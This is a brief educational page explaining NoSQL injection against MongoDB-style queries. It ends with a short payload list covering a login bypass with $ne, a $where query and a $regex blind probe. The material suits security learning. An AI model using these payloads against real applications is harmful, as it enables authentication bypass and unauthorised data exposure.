NoSQL injection

What is it?

NoSQL injection is where an attacker can manipulate the queries made to a NoSQL database through user input.

A simple example:

  • A vulnerable web application has the endpoint /search?user={username}

  • When a request is made, the application queries a NoSQL database (e.g., MongoDB) like this: db.users.find({username: {$eq: username}})

  • If an attacker inserts a payload into {username} such as {"$ne": ""}, it may modify the query to retrieve all users.

  • The vulnerable application sends this query to the database, potentially leaking all usernames.

It's important to note that payloads may vary depending on the database, query, and application. NoSQL injection can lead to:

  • Sensitive data exposure

  • Data manipulation

  • Denial of service

Other learning resources:


Have a good writeup & want to share it here? Drop me a message on LinkedIn.



# basic login bypass
{"username": "anyname", "password": {"$ne": ""}}
# retrieve data
{"$where": "this.someField == 'someValue'"}
# blind
{"someField": {"$regex": "^someValue"}}

Last updated